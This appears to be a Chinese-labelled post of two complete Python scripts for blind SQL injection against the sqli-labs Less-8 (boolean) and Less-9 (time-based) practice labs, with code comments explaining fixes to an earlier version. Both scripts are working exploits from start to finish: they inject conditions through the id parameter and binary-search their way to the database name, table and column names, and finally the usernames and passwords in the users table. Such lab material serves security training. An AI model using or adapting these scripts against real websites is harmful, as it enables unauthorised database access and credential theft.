
SQL盲注脚本（针对本地 sqli-labs 靶场，仅用于授权的测试环境）

布尔盲注（sqli-labs Less-8，页面仅在注入条件为真时返回标志字符串）:

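import requests
from collections.abc import Callable

# Lab target.  Everything appended after "and " is the injected boolean
# condition; every payload ends in "--+", which comments out the remainder of
# the server's query ("+" decodes to the space that MySQL's "-- " needs).
url = "http://192.168.1.190/sqli-labs/Less-8/?id=1' and "
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0'
}
# Marker present in the response only when the injected condition is TRUE.
# Less-8 prints nothing distinctive for FALSE, so FALSE is simply the absence
# of this marker.  The original script also kept flagFalse = "" and tested
# `flagFalse in page`; an empty string is contained in every string, so that
# test was always True and the row-data length loop stopped at its very first
# iteration (length 500).  Never match on an empty marker.
flagTrue = "You are in..........."

# Upper bound on any single request so a dropped connection cannot hang the scan.
REQUEST_TIMEOUT = 10

# One session reuses the TCP connection across the hundreds of small probes.
session = requests.Session()
session.headers.update(headers)


def ask(condition: str) -> bool:
    """Send one boolean-blind probe and report whether *condition* held.

    ``condition`` is a MySQL boolean expression without the trailing comment;
    the function appends ``--+`` itself.  Returns True when the TRUE marker is
    present in the page.  Raises requests.RequestException on network errors
    or timeout.
    """
    resp = session.get(url + f"{condition}--+", timeout=REQUEST_TIMEOUT)
    return flagTrue in resp.text


def bisect_value(is_greater: Callable[[int], bool], low: int, high: int) -> int:
    """Binary-search a hidden integer in [low, high].

    ``is_greater(mid)`` must answer "is the hidden value > mid?".  Returns the
    hidden value when it lies inside [low, high]; a value outside the bounds is
    silently clamped to the nearest bound, so pick bounds that cover every
    value that can occur.  Costs about log2(high - low) probes.
    """
    while low < high:
        mid = (low + high) // 2
        if is_greater(mid):
            low = mid + 1
        else:
            high = mid
    return low


def find_length(expr: str, max_len: int) -> int:
    """Return length((expr)) using a binary search over [0, max_len].

    The original counted down linearly from max_len (up to max_len probes);
    the search needs ~log2(max_len).  A string longer than max_len is reported
    as exactly max_len, so a result equal to max_len means the cap is too small
    and the extraction below would be truncated.
    """
    return bisect_value(lambda mid: ask(f"length(({expr}))>{mid}"), 0, max_len)


def extract_string(expr: str, length: int, low: int = 48, high: int = 122) -> str:
    """Recover the first *length* characters of (expr), one binary search each.

    MySQL's substr() is 1-indexed, hence positions 1..length.  The default
    bounds 48 ('0') .. 122 ('z') cover identifiers built from [0-9A-Za-z_];
    pass 32..126 (printable ASCII) for arbitrary data such as passwords,
    otherwise characters like '-' (45) or '!' (33) are clamped to '0'.
    """
    chars = []
    for pos in range(1, length + 1):
        code = bisect_value(
            lambda mid, pos=pos: ask(f"ascii(substr(({expr}),{pos},1))>{mid}"),
            low,
            high,
        )
        chars.append(chr(code))
    return "".join(chars)


def dump(expr: str, max_len: int, low: int = 48, high: int = 122) -> str:
    """Measure then extract the value of one SQL expression."""
    return extract_string(expr, find_length(expr, max_len), low, high)


def main() -> None:
    """Walk the usual blind-injection chain: database -> tables -> columns -> rows."""
    # 1/2: name of the current database.
    database_name = dump("select database()", 20)
    print(f"数据库名为:{database_name}")

    # 3/4: every table of that database, comma-joined by group_concat().
    # NOTE: group_concat() truncates its result at group_concat_max_len
    # (1024 bytes by default), so a large schema will be cut off silently.
    table_name = dump(
        "select group_concat(table_name) from information_schema.tables "
        "where table_schema=database()",
        100,
    )
    print(f"{database_name}数据库下有表:{table_name}")

    # 5/6: columns of the `users` table.  The original measured this length
    # with `table_name="users"` and stored `i` instead of `i + 1`, dropping the
    # last character; the single-quoted literal below is also what the
    # extraction query used, and it keeps working under ANSI_QUOTES sql_mode,
    # where double quotes delimit identifiers rather than strings.
    column_name = dump(
        "select group_concat(column_name) from information_schema.columns "
        "where table_schema=database() and table_name='users'",
        100,
    )
    print(f"表下有:{column_name}字段")

    # 7/8: row data.  Printable-ASCII bounds because password values may
    # contain punctuation outside the identifier range.  Same group_concat
    # truncation caveat as above.
    data = dump("select group_concat(username,id,password) from users", 500, 32, 126)
    print(f"表下有数据:{data}")


if __name__ == "__main__":
    main()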

时间盲注（sqli-labs Less-9，页面对真假条件的返回完全相同，只能以 sleep() 造成的响应延迟作为判断依据）:

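import requests
from collections.abc import Callable

# Lab target.  Everything appended after "and " is the injected condition;
# every payload ends in "--+", which comments out the remainder of the
# server's query ("+" decodes to the space that MySQL's "-- " needs).
url = "http://192.168.1.190/sqli-labs/Less-9/?id=1' and "
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0'
}

# Less-9 returns the same page whether the condition is true or false, so the
# only oracle is time: sleep() is made to fire when the condition is TRUE.
LENGTH_SLEEP = 2.0   # seconds of sleep() for the handful of length probes
CHAR_SLEEP = 0.1     # seconds of sleep() for the many per-character probes
# A probe counts as TRUE when it took longer than half its sleep, the same
# margin the original used (sleep 2 -> 1 s, sleep 0.1 -> 0.05 s).  Outside a
# quiet LAN, 50 ms of jitter is routine; the binary search below does not
# self-correct, so one misjudged probe corrupts that character.  Raise
# CHAR_SLEEP (at the cost of a slower scan) if the output looks garbled.
REQUEST_TIMEOUT = 10

# One session reuses the TCP connection, which also steadies the timings.
session = requests.Session()
session.headers.update(headers)


def ask(condition: str, delay: float = CHAR_SLEEP) -> bool:
    """Report whether *condition* held on the server, judged by response time.

    The payload is ``if(<condition>,sleep(<delay>),1)--+``; MySQL sleeps
    *delay* seconds only when the condition is TRUE.  ``resp.elapsed`` is the
    time until the response headers arrived, which includes that sleep.  A slow
    response is re-checked once before it is accepted: on a noisy link the
    usual error is a FALSE probe that merely arrived late, and the retry costs
    nothing on the FALSE branch.  NOTE(review): sleep() inside a WHERE clause
    fires once per matching row; ``id=1`` presumably matches a single row here,
    but against a multi-row match the delay multiplies.  Raises
    requests.RequestException on network errors or timeout.
    """
    payload = f"if({condition},sleep({delay}),1)--+"
    threshold = delay / 2
    # The timeout must comfortably exceed the deliberate sleep, or every TRUE
    # probe would surface as a network error.
    timeout = max(REQUEST_TIMEOUT, delay * 5)

    def slow() -> bool:
        resp = session.get(url + payload, timeout=timeout)
        return resp.elapsed.total_seconds() > threshold

    return slow() and slow()


def bisect_value(is_greater: Callable[[int], bool], low: int, high: int) -> int:
    """Binary-search a hidden integer in [low, high].

    ``is_greater(mid)`` must answer "is the hidden value > mid?".  Returns the
    hidden value when it lies inside [low, high]; a value outside the bounds is
    silently clamped to the nearest bound, so pick bounds that cover every
    value that can occur.  Costs about log2(high - low) probes.
    """
    while low < high:
        mid = (low + high) // 2
        if is_greater(mid):
            low = mid + 1
        else:
            high = mid
    return low


def find_length(expr: str, max_len: int) -> int:
    """Return length((expr)) via binary search over [0, max_len].

    The original counted down from max_len one probe at a time; ~log2(max_len)
    probes suffice, which is why the long LENGTH_SLEEP stays affordable.  A
    string longer than max_len is reported as exactly max_len, so a result
    equal to max_len means the cap is too small and extraction would truncate.
    """
    return bisect_value(
        lambda mid: ask(f"length(({expr}))>{mid}", LENGTH_SLEEP), 0, max_len
    )


def extract_string(expr: str, length: int, low: int = 48, high: int = 122) -> str:
    """Recover the first *length* characters of (expr), one binary search each.

    MySQL's substr() is 1-indexed, hence positions 1..length.  The default
    bounds 48 ('0') .. 122 ('z') cover identifiers built from [0-9A-Za-z_];
    pass 32..126 (printable ASCII) for arbitrary data such as passwords,
    otherwise characters like '-' (45) or '!' (33) are clamped to '0'.  The
    partial result is printed after every character because a time-based scan
    is slow and the reader wants to see progress.
    """
    chars = []
    for pos in range(1, length + 1):
        code = bisect_value(
            lambda mid, pos=pos: ask(f"ascii(substr(({expr}),{pos},1))>{mid}"),
            low,
            high,
        )
        chars.append(chr(code))
        print("".join(chars))
    return "".join(chars)


def dump(expr: str, max_len: int, low: int = 48, high: int = 122) -> str:
    """Measure, print, then extract the value of one SQL expression."""
    length = find_length(expr, max_len)
    print(length)
    return extract_string(expr, length, low, high)


def main() -> None:
    """Walk the usual blind-injection chain: database -> tables -> columns -> rows."""
    # 1/2: name of the current database.
    database_name = dump("select database()", 20)
    print(database_name)

    # 3/4: every table of that database, comma-joined by group_concat().
    # NOTE: group_concat() truncates at group_concat_max_len (1024 bytes by
    # default), so a large schema is cut off silently.
    table_name = dump(
        "select group_concat(table_name) from information_schema.tables "
        "where table_schema=database()",
        100,
    )
    print(table_name)

    # 5/6: columns of the `users` table.
    column_name = dump(
        "select group_concat(column_name) from information_schema.columns "
        "where table_schema=database() and table_name='users'",
        100,
    )
    print(column_name)

    # 7/8: row data.  The original measured the length of
    # group_concat(username,password) but extracted
    # group_concat(username,id,password), so the longer string was cut short;
    # both steps now use the same expression.  Printable-ASCII bounds because
    # passwords may contain punctuation outside the identifier range.
    data = dump("select group_concat(username,id,password) from users", 300, 32, 126)
    print(data)


if __name__ == "__main__":
    main()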
